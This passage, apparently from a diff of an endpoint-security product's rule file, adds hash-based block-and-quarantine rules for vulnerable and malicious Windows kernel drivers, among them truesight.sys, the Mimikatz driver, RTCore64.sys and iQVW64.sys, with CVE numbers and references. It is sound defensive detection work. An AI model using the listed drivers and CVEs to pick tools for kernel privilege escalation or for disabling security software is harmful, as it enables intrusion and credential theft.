"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b9f4b0bde872ec87194f5519dac7dbddfec613002e4b2015ef035d7c46301a81", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d0b65c04-f43c-5147-b0f9-efca4cfc0ae6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984786Z", + "creation_date": "2026-03-23T11:45:29.984789Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984794Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0aafa9f47acf69d46c9542985994ff5321f00842a28df2396d4a3076776a83cb", + "comment": "Dangerous Physmem Kernel Driver (aka AsrRapidStartDrv.Sys) [https://www.loldrivers.io/drivers/19d16518-4aee-4983-ba89-dbbe0fa8a3e7/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d0c4b3a5-69df-5053-aa09-a5f09593d3a0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970600Z", + "creation_date": "2026-03-23T11:45:29.970602Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970607Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "183ce4afa337da0edf454b6d1ae4c7f3b517751540813063fd69aa7ccb9dd4c0", + "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d0e162de-e7be-5114-b747-0b17ee380eea", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154316Z", + "creation_date": "2026-03-23T11:45:31.154317Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154323Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "76959cc4c02c08fe11c76a1390f5fe681470cb112b8e5dda1a07ebbf10f675f1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d0e2e060-c822-5e6e-b214-bb115e1e2cec", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826815Z", + "creation_date": "2026-03-23T11:45:30.826818Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:30.826827Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8117b99bfa76722d593a60185368304e7eae96a2018430fb9382b740cc68ca7a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d0e58ad1-f1b7-5dbe-9ef9-1d7b5cf2e12e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.153971Z", + "creation_date": "2026-03-23T11:45:31.153973Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.153978Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "007c79a894bb05c1e0a043a5a3468ae1b21c6bd28f77084045423200186691f8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d0e9d8a8-d11e-51a8-9829-1ad0a8239a2f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156091Z", + "creation_date": "2026-03-23T11:45:31.156093Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156098Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "be335b1a16e6dcbe99f90c03756369969f88642a9a033bd797478f9a12d4bf74", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d0effe10-7cd5-5baa-b6b8-50f8aba063ac", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141024Z", + "creation_date": "2026-03-23T11:45:31.141026Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141031Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "c702628c85e8c787562444eb9913a410644a9f7ebdb9e9257e233ace66f4299f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d0f154df-6017-5411-87b9-a542eaec2bc2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.833726Z", + "creation_date": "2026-03-23T11:45:30.833730Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.833738Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5d6194270f505b49f7b1289249605bf7000b97f52aa9f06cb7c1e94c50d71d39", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d0fb6ec1-19e6-54c4-9ea9-e9c62583dfff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612317Z", + "creation_date": "2026-03-23T11:45:29.612318Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612324Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e32ab30d01dcff6418544d93f99ae812d2ce6396e809686620547bea05074f6f", + "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d10adcd6-224a-5685-8a40-93daddce5be7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828221Z", + "creation_date": "2026-03-23T11:45:30.828224Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828229Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "91f63fb221f9cc3d3042f0def671b3c9d8aa6daab71b31ce4c49289788d6b89b", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d121ded0-fcba-52f4-9dfd-601f6d45d7b5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.477288Z", + "creation_date": "2026-03-23T11:45:31.477292Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.477302Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a874d95a024183c7f3f885180a4520b069df40e558598703cf56756510d97d49", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d1220561-9f6f-5a70-bcf6-49d61d933be3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", 
+ "last_update": "2026-03-23T11:45:29.607613Z", + "creation_date": "2026-03-23T11:45:29.607615Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607620Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5f20541f859f21b3106e12d37182b1ea39bb75ffcfcddb2ece4f6edd42c0bab2", + "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d123778c-e263-5486-9dde-18562873d99e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.824006Z", + "creation_date": "2026-03-23T11:45:31.824009Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.824016Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "85149fa4fbeaf225c5bf7e8b2f84b21e4305bc8fa61098e0d3b9cc437479958e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file 
SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d12edae2-6cb1-5d32-9c37-dbe58dc94c27", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.474330Z", + "creation_date": "2026-03-23T11:45:30.474333Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.474342Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4c03f7e80857630277d292ad7324541cad38f652a199d94bc18a10aef98c8bfa", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d13ff1c1-c131-5584-9e70-4288ce1d297b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829575Z", + "creation_date": "2026-03-23T11:45:31.829577Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + 
"hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.829583Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a6f6ab1d4ee5f77b1333935ebb5afca18ed35c1773b940c4c9964329abe9be84", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d1503b27-3457-582a-be96-293a11e62ff6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145147Z", + "creation_date": "2026-03-23T11:45:31.145149Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.145155Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1be65ff6fb2f175ba8efcca55fd6ca238c817ca541735d4b89f9d771aaf682b4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d16b0862-f27c-5873-a067-d000aef2e18e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976410Z", + "creation_date": "2026-03-23T11:45:29.976412Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976417Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c", + "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d17b2db5-bced-5852-84f2-718f6666b0c1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.814261Z", + "creation_date": "2026-03-23T11:45:31.814264Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.814272Z", + "rule_level": null, + "rule_level_override": null, + 
"rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5de574260ae036244f729af8d2d84800254161363a5c2916279fef35c9c0aea6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d18089a3-090d-516a-9b37-b938fe531db1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974969Z", + "creation_date": "2026-03-23T11:45:29.974971Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974977Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a4a7794cdb933d71f57cf9f31188c1152bdc9fc429e17a84c4f639942965311d", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d1ac343b-ae92-5a76-9312-ee659f7dc767", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": 
"moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972336Z", + "creation_date": "2026-03-23T11:45:29.972338Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972343Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9f94d9180104c820c3d27f03e20f5bbc9d2a5bc2ae6e74baf2a848f2f1790ec8", + "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d1b07451-19aa-5dd8-9251-9277051296ed", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.825817Z", + "creation_date": "2026-03-23T11:45:30.825819Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.825825Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1e58d77e44f08795e33c421b7c3659ba898ac371b6f2986334e09078755a4f20", + 
"comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d1b2dddd-e643-5346-8487-b9634258fdd8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147935Z", + "creation_date": "2026-03-23T11:45:31.147937Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.147942Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "320d0e2f0f941424f2f1c4ace98203648db1f1ceebb02365829f0ffe6fc4c8fc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d1c9c98d-56e3-5c4c-9397-e7a014403630", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141290Z", + "creation_date": "2026-03-23T11:45:31.141292Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141298Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2b4b0a78190d65994a711b909cc14097b72510006a042770bd0a9f1548b9464b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d1cd5a12-2903-5dbb-af5e-896d10ed6bc2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831513Z", + "creation_date": "2026-03-23T11:45:30.831515Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831521Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0c7120fae962b3574d4953e088b1791c77482ec7dbb88ecd7acefd1934d91a77", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
